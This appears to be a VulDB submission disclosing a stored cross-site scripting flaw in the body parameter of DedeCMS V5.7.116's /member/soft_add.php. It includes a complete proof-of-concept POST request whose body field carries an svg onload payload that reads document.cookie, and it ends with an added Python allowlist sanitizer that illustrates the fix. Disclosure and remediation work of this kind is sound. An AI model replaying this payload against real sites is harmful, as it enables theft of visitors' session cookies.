Submission #453003: DedeCMS V5.7.116 Cross Site Scripting (Info)

Title: DedeCMS V5.7.116 Cross Site Scripting
Description:

Summary

A stored Cross-Site Scripting (XSS) vulnerability has been identified in the DedeCMS V5.7.116 content management system. The vulnerability exists due to insufficient filtering of the body parameter in the /member/soft_add.php script. This issue allows an attacker to inject malicious scripts into software information pages, potentially compromising the security of the website and its users.

Details

The vulnerability is present in the /member/soft_add.php script, which does not adequately sanitize the body parameter. An attacker with the ability to register as a member and publish soft can exploit this flaw by injecting malicious scripts into the soft content. These scripts can be executed when other users view the compromised soft.

Proof of Concept (POC)

POST /member/soft_add.php HTTP/1.1
Host: target-ip
Content-Length: 2657
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoNgLBRDOkaHmDGvr
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: [users'cookie]
Connection: keep-alive

------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="dopost"

save
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="channelid"

3
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="title"

test soft
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="tags"

test
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="writer"

test
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="filetype"

.exe
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="language"

简体中文
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="softtype"

国产软件
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="accredit"

共享软件
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="os"

Win2003,WinXP,Win2000,Win9X
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="softrank"

3
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="officialDemo"

------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="officialUrl"

http://
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="softsize"

------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="unit"

MB
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="source"

------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="typeid"

18
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="needmoney"

0
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="litpic"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="dede_addonfields"

------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="dede_fieldshash"

[users'fieldshash]
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="body"

<p>asd</p><svg/onload=alert(document.cookie)>
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="softurl1"

------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="servermsg1"

本地下载
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="picnum"

5
------WebKitFormBoundaryoNgLBRDOkaHmDGvr--
Source: ⚠️ https://github.com/Hebing123/cve/issues/78
User: jiashenghe (UID 39445)
Submission: 2024-11-27 10:34 (2 years ago)
Moderation: 2024-12-04 17:31 (7 days later)
Status: Accepted
VulDB Entry: 286904 [DedeCMS 5.7.116 /member/soft_add.php body cross site scripting]
Points: 20
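The root cause above is that the body field is stored and later rendered without adequate filtering. The following Python sanitizer is an added example (not DedeCMS code, which is PHP) showing the allowlist approach a fix takes: unknown tags such as svg are dropped whole, any on* event-handler attribute is removed, and link targets are restricted to http(s). The allowed tag set and the function names are assumptions chosen for illustration.

```python
from html import escape
from html.parser import HTMLParser

# Allowlisted tags and, per tag, the attributes that may survive (assumed set).
ALLOWED = {"p": set(), "b": set(), "i": set(), "br": set(), "a": {"href"}}
SAFE_SCHEMES = ("http://", "https://")


class AllowlistSanitizer(HTMLParser):
    """Rebuilds HTML keeping only allowlisted tags/attributes; text is re-escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return  # <svg>, <script>, <img>, ... are dropped entirely
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name.startswith("on") or name not in ALLOWED[tag]:
                continue  # no event handlers, no attributes outside the allowlist
            if name == "href" and not (value or "").lower().startswith(SAFE_SCHEMES):
                continue  # blocks javascript: and data: URLs
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text nodes are escaped again so no raw markup survives.
        self.out.append(escape(data, quote=False))


def sanitize_body(html: str) -> str:
    """Return the allowlist-filtered form of a submitted body field."""
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed input mirroring the body value from the PoC request above.
    print(sanitize_body("<p>asd</p><svg/onload=alert(document.cookie)>"))
```

For a production fix a maintained library such as HTML Purifier is preferable to a hand-written parser, but the behaviour to require is the same: allowlist, not blocklist.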
